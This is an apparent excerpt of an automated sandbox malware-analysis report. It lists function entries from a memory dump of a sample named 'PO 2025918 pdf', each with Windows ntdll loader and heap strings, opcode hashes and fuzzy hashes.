                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017021BF
                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01702178
                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01702160, 0170219A, 017021BA
                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0170219F
                                                                                • SXS: %s() passed the empty activation context, xrefs: 01702165
                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01702180
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                • API String ID: 0-861424205
                                                                                • Opcode ID: a09570bc449139b28e2a02bbb73d921bc03d867b327e36b4d168d350194b2989
                                                                                • Instruction ID: 132e573ce2f3aba20076f68583a62880f5407a9444cf6b61561e93cac84e0fc5
                                                                                • Opcode Fuzzy Hash: a09570bc449139b28e2a02bbb73d921bc03d867b327e36b4d168d350194b2989
                                                                                • Instruction Fuzzy Hash: 69313976B40325B7F7229B998C99F7BBBB9EB64E40F05006DFE05A7241D3709E01C6A1
                                                                                Function 016CC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01708170
                                                                                • LdrpInitializeImportRedirection, xrefs: 01708177, 017081EB
                                                                                • LdrpInitializeProcess, xrefs: 016CC6C4
                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01708181, 017081F5
                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 017081E5
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016CC6C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                • API String ID: 0-475462383
                                                                                • Opcode ID: d5ea72b3ca6c77bd7e3d7db883ba6a396e724c5c4583f02cff6063621dd034ad
                                                                                • Instruction ID: 692c695c7cc68b79756aefcdb935875566340c9a9bb02f34f1deefbe49f38f38
                                                                                • Opcode Fuzzy Hash: d5ea72b3ca6c77bd7e3d7db883ba6a396e724c5c4583f02cff6063621dd034ad
                                                                                • Instruction Fuzzy Hash: 7931F271A443069BD320EF29DD86E2ABBD5EF94B24F00055CF945AB391EA20EC05C7A6
                                                                                Function 016D096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 016D2DF0: LdrInitializeThunk.NTDLL ref: 016D2DFA
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0BA3
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0BB6
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0D60
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0D74
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 1404860816-0
                                                                                • Opcode ID: 2d753f4c28dbd283bafecb177c347ddd7831bbe180355c8fa4fff38e6bedf7cd
                                                                                • Instruction ID: f2a013172ff6f02180fc1bd2afe9a1b0de1a8c828fba770d5e6bfed90326de6c
                                                                                • Opcode Fuzzy Hash: 2d753f4c28dbd283bafecb177c347ddd7831bbe180355c8fa4fff38e6bedf7cd
                                                                                • Instruction Fuzzy Hash: 04424B71900715DFDB21CF68C880BAAB7F5FF44314F1445AAE989DB242E770AA85CF61
                                                                                Function 0169A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                • API String ID: 0-379654539
                                                                                • Opcode ID: d4dc65836bedb653c62b33aecf309268e3b50d553fe34685008fe124afdb4a66
                                                                                • Instruction ID: 749931eb6261348640c2b407ede81ec08aecd34aaacbc5cf0d643c41de7af8df
                                                                                • Opcode Fuzzy Hash: d4dc65836bedb653c62b33aecf309268e3b50d553fe34685008fe124afdb4a66
                                                                                • Instruction Fuzzy Hash: 8DC16A752083828FDB11CF98C944B6AB7E8BF85704F04896EF9958B351E734C94ACB96
                                                                                Function 016C8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • @, xrefs: 016C8591
                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 016C855E
                                                                                • LdrpInitializeProcess, xrefs: 016C8422
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016C8421
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-1918872054
                                                                                • Opcode ID: 76320e8989c944d7fba35a92e53166abb3ce6048acb1c833d1a4863b1409d728
                                                                                • Instruction ID: 714d31a616b18ef640033cb4663cfc3121274dedff62d008f77492ff368bbc47
                                                                                • Opcode Fuzzy Hash: 76320e8989c944d7fba35a92e53166abb3ce6048acb1c833d1a4863b1409d728
                                                                                • Instruction Fuzzy Hash: 84918A71508345AFD722DF25CC90EBBBAEDFF94A44F80492EFA8593151E370D9048B66
                                                                                Function 016C273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • .Local, xrefs: 016C28D8
                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017021D9, 017022B1
                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017022B6
                                                                                • SXS: %s() passed the empty activation context, xrefs: 017021DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                • API String ID: 0-1239276146
                                                                                • Opcode ID: f33e596360faaadf857379c44807179d295bd67df737b9158e8ecdc5f50c7f04
                                                                                • Instruction ID: d045228b009423438bfefef9461f787b3490ba2d06159391d6fb68485aba41b7
                                                                                • Opcode Fuzzy Hash: f33e596360faaadf857379c44807179d295bd67df737b9158e8ecdc5f50c7f04
                                                                                • Instruction Fuzzy Hash: F1A19932900229DBDB21CFA9CC98BA9B3B5FB58714F2541EDD908A7351D7309E81CF94
                                                                                Function 016C4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01703437
                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01703456
                                                                                • RtlDeactivateActivationContext, xrefs: 01703425, 01703432, 01703451
                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0170342A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                • API String ID: 0-1245972979
                                                                                • Opcode ID: e5474a851907876c840b094147414684e23eb035b2b8231354c9f027358fdc21
                                                                                • Instruction ID: 9b2799c9c90329e3a303d5df7e94290c37569e089bf985a06e3a287fd181c3a9
                                                                                • Opcode Fuzzy Hash: e5474a851907876c840b094147414684e23eb035b2b8231354c9f027358fdc21
                                                                                • Instruction Fuzzy Hash: ED61DB36640B129FD722CE1CCC91B3AF7E5EB80A60F16856DF9569F290DB30E801CB95
                                                                                Function 016964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 016F106B
                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016F10AE
                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 016F0FE5
                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 016F1028
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                • API String ID: 0-1468400865
                                                                                • Opcode ID: ea9a23d2a217c6b91e1c48f2ae5f42c124ba972bd3e7c65a5b6242fe32f11f44
                                                                                • Instruction ID: 9f8af91910f36bbd2817b925b2fe4beab870dc8a2b20cc0af4886b793b474e55
                                                                                • Opcode Fuzzy Hash: ea9a23d2a217c6b91e1c48f2ae5f42c124ba972bd3e7c65a5b6242fe32f11f44
                                                                                • Instruction Fuzzy Hash: 9971EDB19043059FCB20EF18CC84B9B7BADAF95764F40456CF9498B28AD734D589CBD2
                                                                                Function 016C4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 0170365C
                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01703640, 0170366C
                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0170362F
                                                                                • LdrpFindDllActivationContext, xrefs: 01703636, 01703662
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                • API String ID: 0-3779518884
                                                                                • Opcode ID: 2c918bac463c230cda1bfd2f7714104989554109ea7a8805c0be3ed5a11a6d63
                                                                                • Instruction ID: 8f646a300e173bce901f5ecbec4affcd20698774f7d75ec535db87fd65a80ebf
                                                                                • Opcode Fuzzy Hash: 2c918bac463c230cda1bfd2f7714104989554109ea7a8805c0be3ed5a11a6d63
                                                                                • Instruction Fuzzy Hash: F631D663940611AEDF32FA0CCCA9B39B6A4FB01F64F06816EE90557351DFA0BC808795
                                                                                Function 016B245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • LdrpDynamicShimModule, xrefs: 016FA998
                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 016FA992
                                                                                • apphelp.dll, xrefs: 016B2462
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016FA9A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-176724104
                                                                                • Opcode ID: 613d2126f76c47d0dc38d33368ce21404de6de444a81bcfea3f90802a960767b
                                                                                • Instruction ID: 9268dca700a3cd38aeec3a275a9a319621abca1225f80436411a789fb84b38eb
                                                                                • Opcode Fuzzy Hash: 613d2126f76c47d0dc38d33368ce21404de6de444a81bcfea3f90802a960767b
                                                                                • Instruction Fuzzy Hash: B0318D71690201EBDB319F9DCC84EAEBBB5FB80B20F25406DFA056B345C770A982C790
                                                                                Function 016A29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016A327D
                                                                                • HEAP: , xrefs: 016A3264
                                                                                • HEAP[%wZ]: , xrefs: 016A3255
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                • API String ID: 0-617086771
                                                                                • Opcode ID: 672364950cbfa1712afa705715d6f2b98cc28aaf4c6cce93f031a8faed758495
                                                                                • Instruction ID: 1cd5dc9b23ffc7ca206fd2c19d59598e3bd00980fc679977374d79ff0db9bd4b
                                                                                • Opcode Fuzzy Hash: 672364950cbfa1712afa705715d6f2b98cc28aaf4c6cce93f031a8faed758495
                                                                                • Instruction Fuzzy Hash: FA929971A042499FDB25CFA8C8547AABBF1FF08304F58809DE94AAB352D735AD42CF50
                                                                                Function 016A0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                • API String ID: 0-4253913091
                                                                                • Opcode ID: f3760aaf6bfbc07dc941e1b98f364dc331d7fe36589c1ecfbf6f44391326bc42
                                                                                • Instruction ID: c12ff052d46ff58d482f4eccc2e182e2b30a66b11542089525dd35412283011e
                                                                                • Opcode Fuzzy Hash: f3760aaf6bfbc07dc941e1b98f364dc331d7fe36589c1ecfbf6f44391326bc42
                                                                                • Instruction Fuzzy Hash: C5F19B34A00606DFEB25CF68C894B6ABBB5FF45304F5482A8E5169B396D730ED81CF90
                                                                                Function 016B6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $@
                                                                                • API String ID: 0-1077428164
                                                                                • Opcode ID: 8c292b3093c629f545efcfd3e3ba4d786c42d84cb5234efcc3edc461e6239291
                                                                                • Instruction ID: 87b50d10f3eafd7a649eca1cab6ec1978504c70bc6818805e9c5fb5ffe247898
                                                                                • Opcode Fuzzy Hash: 8c292b3093c629f545efcfd3e3ba4d786c42d84cb5234efcc3edc461e6239291
                                                                                • Instruction Fuzzy Hash: 13C26E71A083559FD725CF28CC81BABBBE5AFC8754F04892DEA8987381D734D885CB52
                                                                                Function 0168A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                • API String ID: 0-2779062949
                                                                                • Opcode ID: 1c86db3dc7d1ee8bc19be6178c18af6dbdad30c9dbf9639a057199f89146cbc6
                                                                                • Instruction ID: 0186883dd15d79262ae07372c4694133bf1efb66950b707a742d159e8f267638
                                                                                • Opcode Fuzzy Hash: 1c86db3dc7d1ee8bc19be6178c18af6dbdad30c9dbf9639a057199f89146cbc6
                                                                                • Instruction Fuzzy Hash: CBA19F71D112299BDB31DF68CC98BEAB7B9EF48700F1042EAD909A7210D7359E84CF54
                                                                                Function 016B0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Failed to allocated memory for shimmed module list, xrefs: 016FA10F
                                                                                • LdrpCheckModule, xrefs: 016FA117
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016FA121
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-161242083
                                                                                • Opcode ID: 73bd2d5f6caa39eb31d5ec53207111799e5423241c9b656fba04347edd4a9f5b
                                                                                • Instruction ID: 8f7fae0a2866380fdd8accc0c3851a26005a6f237ece47a9cabed8f437bc9c64
                                                                                • Opcode Fuzzy Hash: 73bd2d5f6caa39eb31d5ec53207111799e5423241c9b656fba04347edd4a9f5b
                                                                                • Instruction Fuzzy Hash: 2B71CE71A402059FDB25DFA8CD81ABEBBF5FB44714F24806DE906AB351E734A982CB50
                                                                                Function 016A0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                • API String ID: 0-1334570610
                                                                                • Opcode ID: 144f49f40484355d701f7a95d195c2b67ec1d4ebc1882f9d9f7b2683edab281c
                                                                                • Instruction ID: 2f50439385bed0803616cb7bea985ebb12afa0d739c959f23ed25a6d36e268b8
                                                                                • Opcode Fuzzy Hash: 144f49f40484355d701f7a95d195c2b67ec1d4ebc1882f9d9f7b2683edab281c
                                                                                • Instruction Fuzzy Hash: D461BD716003019FDB29CF28C980B6ABBE1FF45704F54855DE95A8B396D771EC81CB91
                                                                                Function 016CC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 017082DE
                                                                                • Failed to reallocate the system dirs string !, xrefs: 017082D7
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017082E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-1783798831
                                                                                • Opcode ID: a5c7873f99295b52118b1d5d537fed1d3056721c64ebdab1a2b32de13c2dae77
                                                                                • Instruction ID: c046fe4d391440f4d6ddf31e1dfff51569c48983939dc5ff815606a14e0de03c
                                                                                • Opcode Fuzzy Hash: a5c7873f99295b52118b1d5d537fed1d3056721c64ebdab1a2b32de13c2dae77
                                                                                • Instruction Fuzzy Hash: C0410771584301ABC721EB68DC44B6FBBE9EF54B64F10852EF949D7290E770D800CBA6
                                                                                Function 0174C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0174C1C5
                                                                                • @, xrefs: 0174C1F1
                                                                                • PreferredUILanguages, xrefs: 0174C212
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                • API String ID: 0-2968386058
                                                                                • Opcode ID: 161ba5e57b672676e39250a11cc1cc8ba8d82f480a46dd35c4f434f22d143206
                                                                                • Instruction ID: 36971d03688b40f10ff2bc8c65a037d35e6cabd24097ee402ef57c312aaca97b
                                                                                • Opcode Fuzzy Hash: 161ba5e57b672676e39250a11cc1cc8ba8d82f480a46dd35c4f434f22d143206
                                                                                • Instruction Fuzzy Hash: A6418571E05219EBDB12DED9CC51FEEFBB9BB14704F00416AE605B7240D7B49A44CB54
                                                                                Function 01724144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                • API String ID: 0-1373925480
                                                                                • Opcode ID: 3f11ed07691718c521a25e567bdd5a238adf297d44f36110ab78e770a73e5187
                                                                                • Instruction ID: af9829de1c5f913aa99d517c871c9aa6502ac86073813ddc44b1dab13ad4c1df
                                                                                • Opcode Fuzzy Hash: 3f11ed07691718c521a25e567bdd5a238adf297d44f36110ab78e770a73e5187
                                                                                • Instruction Fuzzy Hash: 6A41E232A04268CBEB26DBD9CC44BADFBF9FF56340F240459D902EB781D6748902CB51
                                                                                Function 01714755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01714888
                                                                                • LdrpCheckRedirection, xrefs: 0171488F
                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01714899
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                • API String ID: 0-3154609507
                                                                                • Opcode ID: 263a7e763ec1c27409100992e0987338ec7bee1d988344b7b6d507115c55d2ae
                                                                                • Instruction ID: a2a90a061c74bcba5566225cde3177258fcafd2bfa456a53e2afc609a7dd398a
                                                                                • Opcode Fuzzy Hash: 263a7e763ec1c27409100992e0987338ec7bee1d988344b7b6d507115c55d2ae
                                                                                • Instruction Fuzzy Hash: 2041D272A542519FCB22CE5DD840A26FBE5EF49B60F0905ADED4AE7319D730D800CB91
                                                                                Function 016A0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                • API String ID: 0-2558761708
                                                                                • Opcode ID: 3baa124d6abc5f00e35d89d7ff213558eabed967615cac4d84798aa54760cfe5
                                                                                • Instruction ID: 34a6406b4e7f820ef15730f69ef65281c3a7b424895732a2e882dcf8c8a11d42
                                                                                • Opcode Fuzzy Hash: 3baa124d6abc5f00e35d89d7ff213558eabed967615cac4d84798aa54760cfe5
                                                                                • Instruction Fuzzy Hash: 4311DC313561029FDB29DE18CC81B6AB3A9EF41B26F18826DF507CB251DB34EC41CB99
                                                                                Function 017120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • LdrpInitializationFailure, xrefs: 017120FA
                                                                                • Process initialization failed with status 0x%08lx, xrefs: 017120F3
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01712104
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-2986994758
                                                                                • Opcode ID: e806ce78dd70d00c76247f6f8dae81d34c2c8389a07ebb3834b111bda0b239b0
                                                                                • Instruction ID: cd6812291f533d13909855071b8a850e3b331b974d420989a6736a06112cc490
                                                                                • Opcode Fuzzy Hash: e806ce78dd70d00c76247f6f8dae81d34c2c8389a07ebb3834b111bda0b239b0
                                                                                • Instruction Fuzzy Hash: 26F04C74780308BFE720E60DDC57F99BB68FB41B24F20005DF60077289D5B0E940C641
                                                                                Function 016A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
